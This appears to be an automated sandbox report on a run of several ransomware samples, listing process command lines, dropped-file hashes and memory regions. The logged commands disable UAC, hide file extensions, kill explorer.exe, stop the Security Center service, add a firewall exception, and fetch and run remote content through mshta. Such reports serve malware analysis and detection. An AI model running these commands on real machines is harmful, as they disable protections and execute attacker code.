C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\system32\rundll32.exe" "C:\Users\Admin\AppData\Local\Temp\wrkB873.tmp", start worker

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\vsQAAUoU.bat" "C:\Users\Admin\AppData\Local\Temp\[email protected]""

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\csgMgIsk.bat" "C:\Users\Admin\AppData\Local\Temp\[email protected]""

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Users\Admin\AppData\Local\Temp\240628765.exe

"C:\Users\Admin\AppData\Local\Temp\240628765.exe"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Users\Admin\AppData\Local\Temp\@[email protected]

"C:\Users\Admin\AppData\Local\Temp\@[email protected]"

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 6408 -ip 6408

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 6408 -s 564

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Users\Admin\AppData\Local\6AdwCleaner.exe

"C:\Users\Admin\AppData\Local\6AdwCleaner.exe"

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Endermanch@PolyRansom"

C:\Users\Admin\AppData\Local\Temp\is-2M31M.tmp\is-JM222.tmp

"C:\Users\Admin\AppData\Local\Temp\is-2M31M.tmp\is-JM222.tmp" /SL4 $10606 "C:\Users\Admin\AppData\Local\Temp\[email protected]" 779923 55808

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM explorer.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\MoIUIUYg.bat" "C:\Users\Admin\AppData\Local\Temp\[email protected]""

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 2440 -ip 2440

C:\Users\Admin\AppData\Local\Temp\[email protected]

C:\Users\Admin\AppData\Local\Temp\Endermanch@PolyRansom

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2440 -s 444

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\OKYUkkcU.bat" "C:\Users\Admin\AppData\Local\Temp\[email protected]""

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\rundll32.exe

C:\Windows\system32\rundll32.exe C:\Windows\infpub.dat,#1 15

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Endermanch@PolyRansom"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ZCgAUUYE.bat" "C:\Users\Admin\AppData\Local\Temp\[email protected]""

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -u -p 3476 -s 2364

C:\Users\Admin\AppData\Local\Temp\[email protected]

C:\Users\Admin\AppData\Local\Temp\[email protected]

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 6780 -s 448

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\ProgramData\vyQwMwog\xsskQcks.exe

"C:\ProgramData\vyQwMwog\xsskQcks.exe"

C:\Users\Admin\MooskccM\OgMMAEUs.exe

"C:\Users\Admin\MooskccM\OgMMAEUs.exe"

C:\Windows\SysWOW64\cscript.exe

cscript.exe //nologo m.vbs

C:\Windows\SysWOW64\Wbem\mofcomp.exe

mofcomp C:\Users\Admin\AppData\Local\Temp\4otjesjty.mof

C:\Windows\SysWOW64\net.exe

net start wscsvc

C:\Windows\SysWOW64\net.exe

net start winmgmt

C:\Windows\SysWOW64\net.exe

net stop winmgmt /y

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 5324 -ip 5324

C:\Users\Admin\AppData\Local\Temp\[email protected]

C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock

C:\Windows\SysWOW64\net.exe

net stop wscsvc

C:\Windows\SysWOW64\taskkill.exe

taskkill /FI "USERNAME eq Admin" /F /IM OgMMAEUs.exe

C:\Windows\SysWOW64\taskkill.exe

taskkill /FI "USERNAME eq Admin" /F /IM xsskQcks.exe

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -pss -s 492 -p 3476 -ip 3476

C:\Windows\SysWOW64\mshta.exe

mshta.exe "http://78.26.187.35/soft-usage/favicon.ico?0=1200&1=GBQHURCC&2=i-s&3=61&4=9200&5=6&6=2&7=919041&8=1033"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 6780 -ip 6780

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\regsvr32.exe

regsvr32 /s "C:\Program Files (x86)\VAV\vav.exe"

C:\Users\Admin\AppData\Local\Temp\taskdl.exe

taskdl.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 6592 -ip 6592

C:\Windows\SysWOW64\taskkill.exe

taskkill /FI "USERNAME eq Admin" /F /IM xsskQcks.exe

C:\Windows\SysWOW64\taskkill.exe

taskkill /FI "USERNAME eq Admin" /F /IM OgMMAEUs.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 6592 -s 444

C:\Windows\SysWOW64\netsh.exe

netsh "firewall" add allowedprogram "C:\Users\Admin\AppData\Local\Temp\[email protected]" "Internet Security Guard" ENABLE

C:\Windows\SysWOW64\Wbem\mofcomp.exe

mofcomp "C:\Users\Admin\AppData\Local\Temp\1233.mof"

C:\Users\Admin\MooskccM\OgMMAEUs.exe

"C:\Users\Admin\MooskccM\OgMMAEUs.exe"

C:\ProgramData\vyQwMwog\xsskQcks.exe

"C:\ProgramData\vyQwMwog\xsskQcks.exe"

C:\Users\Admin\AppData\Local\Temp\WindowsUpdate.exe

"C:\Users\Admin\AppData\Local\Temp\WindowsUpdate.exe"

Network

Files

memory/3388-132-0x0000025E281E0000-0x0000025E2820C000-memory.dmp

memory/3388-133-0x00007FF894610000-0x00007FF8950D1000-memory.dmp

memory/3388-134-0x00007FF894610000-0x00007FF8950D1000-memory.dmp

memory/4788-135-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe.log

MD5 66a0a4aa01208ed3d53a5e131a8d030a
SHA1 ef5312ba2b46b51a4d04b574ca1789ac4ff4a6b1
SHA256 f0ab05c32d6af3c2b559dbce4dec025ce3e730655a2430ade520e89a557cace8
SHA512 626f0dcf0c6bcdc0fef25dc7da058003cf929fd9a39a9f447b79fb139a417532a46f8bca1ff2dbde09abfcd70f5fb4f8d059b1fe91977c377df2f5f751c84c5c

memory/3388-137-0x00007FF894610000-0x00007FF8950D1000-memory.dmp

memory/4788-138-0x00007FF894610000-0x00007FF8950D1000-memory.dmp

memory/4788-139-0x00007FF894610000-0x00007FF8950D1000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\[email protected]

MD5 c7e9746b1b039b8bd1106bca3038c38f
SHA1 cb93ac887876bafe39c5f9aa64970d5e747fb191
SHA256 b1369bd254d96f7966047ad4be06103830136629590182d49e5cb8680529ebd4
SHA512 cf5d688f1aec8ec65c1cb91d367da9a96911640c695d5c2d023836ef11e374ff158c152b4b6207e8fcdb5ccf0eed79741e080f1cbc915fe0af3dacd624525724

memory/1508-140-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\[email protected]

MD5 382430dd7eae8945921b7feab37ed36b
SHA1 c95ddaebe2ae8fbcb361f3bf080d95a7bb5bf128
SHA256 70e5e902d0ac7534838b743c899f484fe10766aefacc6df697219387a8e3d06b
SHA512 26abc02bde77f0b94613edc32e0843ac71a0a8f3d8ba01cb94a42c047d0be7befef52a81984e9a0fa867400082a8905e7a63aaaf85fa32a03d27f7bc6a548c3b

memory/1460-142-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\[email protected]

MD5 7dfbfba1e4e64a946cb096bfc937fbad
SHA1 9180d2ce387314cd4a794d148ea6b14084c61e1b
SHA256 312f082ea8f64609d30ff62b11f564107bf7a4ec9e95944dfd3da57c6cdb4e94
SHA512 f47b05b9c294688811dd72d17f815cce6c90f96d78f6835804d5182e2f4bfbd2d6738de854b8a79dea6345f9372ba76a36920e51e6cb556ef4b38b620e887eb4

memory/2800-146-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\[email protected]

MD5 7dfbfba1e4e64a946cb096bfc937fbad
SHA1 9180d2ce387314cd4a794d148ea6b14084c61e1b
SHA256 312f082ea8f64609d30ff62b11f564107bf7a4ec9e95944dfd3da57c6cdb4e94
SHA512 f47b05b9c294688811dd72d17f815cce6c90f96d78f6835804d5182e2f4bfbd2d6738de854b8a79dea6345f9372ba76a36920e51e6cb556ef4b38b620e887eb4

C:\Users\Admin\AppData\Local\Temp\[email protected]

MD5 382430dd7eae8945921b7feab37ed36b
SHA1 c95ddaebe2ae8fbcb361f3bf080d95a7bb5bf128
SHA256 70e5e902d0ac7534838b743c899f484fe10766aefacc6df697219387a8e3d06b
SHA512 26abc02bde77f0b94613edc32e0843ac71a0a8f3d8ba01cb94a42c047d0be7befef52a81984e9a0fa867400082a8905e7a63aaaf85fa32a03d27f7bc6a548c3b

C:\Users\Admin\AppData\Local\Temp\[email protected]

MD5 c7e9746b1b039b8bd1106bca3038c38f
SHA1 cb93ac887876bafe39c5f9aa64970d5e747fb191
SHA256 b1369bd254d96f7966047ad4be06103830136629590182d49e5cb8680529ebd4
SHA512 cf5d688f1aec8ec65c1cb91d367da9a96911640c695d5c2d023836ef11e374ff158c152b4b6207e8fcdb5ccf0eed79741e080f1cbc915fe0af3dacd624525724

memory/2916-149-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\[email protected]

MD5 910dd666c83efd3496f21f9f211cdc1f
SHA1 77cd736ee1697beda0ac65da24455ec566ba7440
SHA256 06effc4c15d371b5c40a84995a7bae75324b690af9fbe2e8980f8c0e0901bf45
SHA512 467d3b4d45a41b90c8e29c8c3d46ddfbdee9875606cd1c1b7652c2c7e26d60fedac54b24b75def125d450d8e811c75974260ba48a79496d2bdaf17d674eddb47

memory/2800-156-0x0000000000400000-0x0000000000A06000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\[email protected]

MD5 fe1bc60a95b2c2d77cd5d232296a7fa4
SHA1 c07dfdea8da2da5bad036e7c2f5d37582e1cf684
SHA256 b3e1e9d97d74c416c2a30dd11858789af5554cf2de62f577c13944a19623777d
SHA512 266c541a421878e1e175db5d94185c991cec5825a4bc50178f57264f3556080e6fe984ed0380acf022ce659aa1ca46c9a5e97efc25ff46cbfd67b9385fd75f89

memory/5020-162-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\[email protected]

MD5 0a7b70efba0aa93d4bc0857b87ac2fcb
SHA1 01a6c963b2f5f36ff21a1043587dcf921ae5f5cd
SHA256 4f5bff64160044d9a769ab277ff85ba954e2a2e182c6da4d0672790cf1d48309
SHA512 2033f9637b8d023242c93f54c140dd561592a3380a15a9fdc8ebfa33385ff4fc569d66c846a01b4ac005f0521b3c219e87f4b1ed2a83557f9d95fa066ad25e14

memory/3696-160-0x0000000000000000-mapping.dmp

memory/4012-159-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\[email protected]

MD5 41789c704a0eecfdd0048b4b4193e752
SHA1 fb1e8385691fa3293b7cbfb9b2656cf09f20e722
SHA256 b2dcfdf9e7b09f2aa5004668370e77982963ace820e7285b2e264a294441da23
SHA512 76391ac85fdc3be75441fcd6e19bed08b807d3946c7281c647f16a3be5388f7be307e6323fac8502430a4a6d800d52a88709592a49011ecc89de4f19102435ea

memory/8-155-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\[email protected]

MD5 fbbdc39af1139aebba4da004475e8839
SHA1 de5c8d858e6e41da715dca1c019df0bfb92d32c0
SHA256 630325cac09ac3fab908f903e3b00d0dadd5fdaa0875ed8496fcbb97a558d0da
SHA512 74eca8c01de215b33d5ceea1fda3f3bef96b513f58a750dba04b0de36f7ef4f7846a6431d52879ca0d8641bfd504d4721a9a96fa2e18c6888fd67fa77686af87

memory/3292-151-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\[email protected]

MD5 910dd666c83efd3496f21f9f211cdc1f
SHA1 77cd736ee1697beda0ac65da24455ec566ba7440
SHA256 06effc4c15d371b5c40a84995a7bae75324b690af9fbe2e8980f8c0e0901bf45
SHA512 467d3b4d45a41b90c8e29c8c3d46ddfbdee9875606cd1c1b7652c2c7e26d60fedac54b24b75def125d450d8e811c75974260ba48a79496d2bdaf17d674eddb47

C:\Users\Admin\AppData\Local\Temp\[email protected]

MD5 248aadd395ffa7ffb1670392a9398454
SHA1 c53c140bbdeb556fca33bc7f9b2e44e9061ea3e5
SHA256 51290129cccca38c6e3b4444d0dfb8d848c8f3fc2e5291fc0d219fd642530adc
SHA512 582b917864903252731c3d0dff536d7b1e44541ee866dc20e0341cbee5450f2f0ff4d82e1eee75f770e4dad9d8b9270ab5664ffedfe21d1ad2bd7fe6bc42cf0e

memory/8-165-0x0000000000400000-0x0000000000438000-memory.dmp

memory/2800-166-0x0000000000400000-0x0000000000A06000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\[email protected]

MD5 fe1bc60a95b2c2d77cd5d232296a7fa4
SHA1 c07dfdea8da2da5bad036e7c2f5d37582e1cf684
SHA256 b3e1e9d97d74c416c2a30dd11858789af5554cf2de62f577c13944a19623777d
SHA512 266c541a421878e1e175db5d94185c991cec5825a4bc50178f57264f3556080e6fe984ed0380acf022ce659aa1ca46c9a5e97efc25ff46cbfd67b9385fd75f89

memory/4396-169-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\[email protected]

MD5 cb02c0438f3f4ddabce36f8a26b0b961
SHA1 48c4fcb17e93b74030415996c0ec5c57b830ea53
SHA256 64677f7767d6e791341b2eac7b43df90d39d9bdf26d21358578d2d38037e2c32
SHA512 373f91981832cd9a1ff0b8744b43c7574b72971b5b6b19ea1f4665b6c878f7a1c7834ac08b92e0eca299eb4b590bf10f48a0485350a77a5f85fc3d2dd6913db3

C:\Users\Admin\AppData\Local\Temp\[email protected]

MD5 b805db8f6a84475ef76b795b0d1ed6ae
SHA1 7711cb4873e58b7adcf2a2b047b090e78d10c75b
SHA256 f5d002bfe80b48386a6c99c41528931b7f5df736cd34094463c3f85dde0180bf
SHA512 62a2c329b43d186c4c602c5f63efc8d2657aa956f21184334263e4f6d0204d7c31f86bda6e85e65e3b99b891c1630d805b70997731c174f6081ecc367ccf9416

C:\Users\Admin\AppData\Local\Temp\[email protected]

MD5 b805db8f6a84475ef76b795b0d1ed6ae
SHA1 7711cb4873e58b7adcf2a2b047b090e78d10c75b
SHA256 f5d002bfe80b48386a6c99c41528931b7f5df736cd34094463c3f85dde0180bf
SHA512 62a2c329b43d186c4c602c5f63efc8d2657aa956f21184334263e4f6d0204d7c31f86bda6e85e65e3b99b891c1630d805b70997731c174f6081ecc367ccf9416

memory/4012-179-0x0000000000400000-0x0000000000450000-memory.dmp

memory/4396-185-0x0000000005A00000-0x0000000005A9C000-memory.dmp

memory/4396-180-0x0000000000F80000-0x0000000001172000-memory.dmp

memory/5056-190-0x0000000000000000-mapping.dmp

memory/3696-184-0x0000000000760000-0x00000000007E2000-memory.dmp

memory/4688-191-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\[email protected]

MD5 2eb3ce80b26345bd139f7378330b19c1
SHA1 10122bd8dd749e20c132d108d176794f140242b0
SHA256 8abed3ea04d52c42bdd6c9169c59212a7d8c649c12006b8278eda5aa91154cd2
SHA512 e3223cd07d59cd97893304a3632b3a66fd91635848160c33011c103cca2badbfe9b78fe258666b634e455872f3a98889ede5a425d8fae91cae6983da1ea1190a

memory/2084-192-0x0000000005AD0000-0x0000000006074000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\[email protected]

MD5 d0deb2644c9435ea701e88537787ea6e
SHA1 866e47ecd80da89c4f56557659027a3aee897132
SHA256 ad6cd46f373aadad85fab5ecdb4cb4ad7ebd0cbe44c84db5d2a2ee1b54eb5ec3
SHA512 6faac2e1003290bb3a0613ee84d5c76d3c48a4524e97975e9174d6fcfb5a6a48d6648b06ed5a4c10c3349f70efffc6a08a185fdeb0824250ae044b96ef39fcdf

C:\Users\Admin\AppData\Local\Temp\[email protected]

MD5 2eb3ce80b26345bd139f7378330b19c1
SHA1 10122bd8dd749e20c132d108d176794f140242b0
SHA256 8abed3ea04d52c42bdd6c9169c59212a7d8c649c12006b8278eda5aa91154cd2
SHA512 e3223cd07d59cd97893304a3632b3a66fd91635848160c33011c103cca2badbfe9b78fe258666b634e455872f3a98889ede5a425d8fae91cae6983da1ea1190a

C:\Users\Admin\AppData\Local\Temp\[email protected]

MD5 d0deb2644c9435ea701e88537787ea6e
SHA1 866e47ecd80da89c4f56557659027a3aee897132
SHA256 ad6cd46f373aadad85fab5ecdb4cb4ad7ebd0cbe44c84db5d2a2ee1b54eb5ec3
SHA512 6faac2e1003290bb3a0613ee84d5c76d3c48a4524e97975e9174d6fcfb5a6a48d6648b06ed5a4c10c3349f70efffc6a08a185fdeb0824250ae044b96ef39fcdf

memory/2540-198-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\[email protected]

MD5 1f13396fa59d38ebe76ccc587ccb11bb
SHA1 867adb3076c0d335b9bfa64594ef37a7e2c951ff
SHA256 83ecb875f87150a88f4c3d496eb3cb5388cd8bafdff4879884ececdbd1896e1d
SHA512 82ca2c781bdaa6980f365d1eedb0af5ac5a80842f6edc28a23a5b9ea7b6feec5cd37d54bd08d9281c9ca534ed0047e1e234873b06c7d2b6fe23a7b88a4394fdc

memory/8-201-0x0000000000400000-0x0000000000438000-memory.dmp

memory/2084-204-0x00000000057A0000-0x00000000057F6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\[email protected]

MD5 63210f8f1dde6c40a7f3643ccf0ff313
SHA1 57edd72391d710d71bead504d44389d0462ccec9
SHA256 2aab13d49b60001de3aa47fb8f7251a973faa7f3c53a3840cdf5fd0b26e9a09f
SHA512 87a89e8ab85be150a783a9f8d41797cfa12f86fdccb48f2180c0498bfd2b1040b730dee4665fe2c83b98d436453680226051b7f1532e1c0e0cda0cf702e80a11

C:\Users\Admin\AppData\Local\Temp\[email protected]

MD5 63210f8f1dde6c40a7f3643ccf0ff313
SHA1 57edd72391d710d71bead504d44389d0462ccec9
SHA256 2aab13d49b60001de3aa47fb8f7251a973faa7f3c53a3840cdf5fd0b26e9a09f
SHA512 87a89e8ab85be150a783a9f8d41797cfa12f86fdccb48f2180c0498bfd2b1040b730dee4665fe2c83b98d436453680226051b7f1532e1c0e0cda0cf702e80a11

memory/2968-205-0x0000000000000000-mapping.dmp

memory/4396-203-0x00000000059E0000-0x00000000059EA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\[email protected]

MD5 1f13396fa59d38ebe76ccc587ccb11bb
SHA1 867adb3076c0d335b9bfa64594ef37a7e2c951ff
SHA256 83ecb875f87150a88f4c3d496eb3cb5388cd8bafdff4879884ececdbd1896e1d
SHA512 82ca2c781bdaa6980f365d1eedb0af5ac5a80842f6edc28a23a5b9ea7b6feec5cd37d54bd08d9281c9ca534ed0047e1e234873b06c7d2b6fe23a7b88a4394fdc

memory/4012-199-0x0000000001650000-0x0000000001681000-memory.dmp

memory/3696-194-0x0000000005160000-0x00000000051F2000-memory.dmp

memory/2084-189-0x0000000000B90000-0x0000000000BCC000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\[email protected]

MD5 87ccd6f4ec0e6b706d65550f90b0e3c7
SHA1 213e6624bff6064c016b9cdc15d5365823c01f5f
SHA256 e79f164ccc75a5d5c032b4c5a96d6ad7604faffb28afe77bc29b9173fa3543e4
SHA512 a72403d462e2e2e181dbdabfcc02889f001387943571391befed491aaecba830b0869bdd4d82bca137bd4061bbbfb692871b1b4622c4a7d9f16792c60999c990

C:\Users\Admin\AppData\Local\Temp\[email protected]

MD5 87ccd6f4ec0e6b706d65550f90b0e3c7
SHA1 213e6624bff6064c016b9cdc15d5365823c01f5f
SHA256 e79f164ccc75a5d5c032b4c5a96d6ad7604faffb28afe77bc29b9173fa3543e4
SHA512 a72403d462e2e2e181dbdabfcc02889f001387943571391befed491aaecba830b0869bdd4d82bca137bd4061bbbfb692871b1b4622c4a7d9f16792c60999c990

memory/8-183-0x0000000000400000-0x0000000000438000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\[email protected]

MD5 04155ed507699b4e37532e8371192c0b
SHA1 a14107131237dbb0df750e74281c462a2ea61016
SHA256 b6371644b93b9d3b9b32b2f13f8265f9c23ddecc1e9c5a0291bbf98aa0fc3b77
SHA512 6de59ebbc9b96c8a19d530caa13aa8129531ebd14b3b6c6bbb758426b59ed5ab12483bfa232d853af2e661021231b4b3fcc6c53e187eeba38fa523f673115371

C:\Users\Admin\AppData\Local\Temp\[email protected]

MD5 04155ed507699b4e37532e8371192c0b
SHA1 a14107131237dbb0df750e74281c462a2ea61016
SHA256 b6371644b93b9d3b9b32b2f13f8265f9c23ddecc1e9c5a0291bbf98aa0fc3b77
SHA512 6de59ebbc9b96c8a19d530caa13aa8129531ebd14b3b6c6bbb758426b59ed5ab12483bfa232d853af2e661021231b4b3fcc6c53e187eeba38fa523f673115371

memory/2376-178-0x0000000000000000-mapping.dmp

memory/2876-175-0x0000000000000000-mapping.dmp

memory/8-174-0x0000000000690000-0x0000000000696000-memory.dmp

memory/3480-208-0x0000000000000000-mapping.dmp

memory/2440-214-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\[email protected]

MD5 e4d4a59494265949993e26dee7b077d1
SHA1 83e3d0c7e544117d6054e7d55932a7d2dbaf1163
SHA256 5ae57d8750822c203f5bf5e241c7132377b250df36a215dff2f396c8440b82dd
SHA512 efd176555415e0771a22a6ca6f15a82aec14ca090d2599959612db9d8e07065e38a7b82e2bf7be67cbe1494733344879782f5516bb502e0177e7b540c96fa718

C:\Users\Admin\AppData\Local\Temp\[email protected]

MD5 af2379cc4d607a45ac44d62135fb7015
SHA1 39b6d40906c7f7f080e6befa93324dddadcbd9fa
SHA256 26b4699a7b9eeb16e76305d843d4ab05e94d43f3201436927e13b3ebafa90739
SHA512 69899c47d0b15f92980f79517384e83373242e045ca696c6e8f930ff6454219bf609e0d84c2f91d25dfd5ef3c28c9e099c4a3a918206e957be806a1c2e0d3e99

C:\Users\Admin\AppData\Local\Temp\[email protected]

MD5 e4d4a59494265949993e26dee7b077d1
SHA1 83e3d0c7e544117d6054e7d55932a7d2dbaf1163
SHA256 5ae57d8750822c203f5bf5e241c7132377b250df36a215dff2f396c8440b82dd
SHA512 efd176555415e0771a22a6ca6f15a82aec14ca090d2599959612db9d8e07065e38a7b82e2bf7be67cbe1494733344879782f5516bb502e0177e7b540c96fa718

memory/3480-213-0x0000000000690000-0x00000000006BE000-memory.dmp

memory/5052-212-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\6AdwCleaner.exe

MD5 87e4959fefec297ebbf42de79b5c88f6
SHA1 eba50d6b266b527025cd624003799bdda9a6bc86
SHA256 4f0033e811fe2497b38f0d45df958829d01933ebe7d331079eefc8e38fbeaa61
SHA512 232fedec0180e85560a226870a244a22f54ca130ed6d6dc95dc02a1ff85f17da396925c9ff27d522067a30ee3e74a38adff375d8752161ee629df14f39cf6ba9

C:\Users\Admin\AppData\Local\6AdwCleaner.exe

MD5 87e4959fefec297ebbf42de79b5c88f6
SHA1 eba50d6b266b527025cd624003799bdda9a6bc86
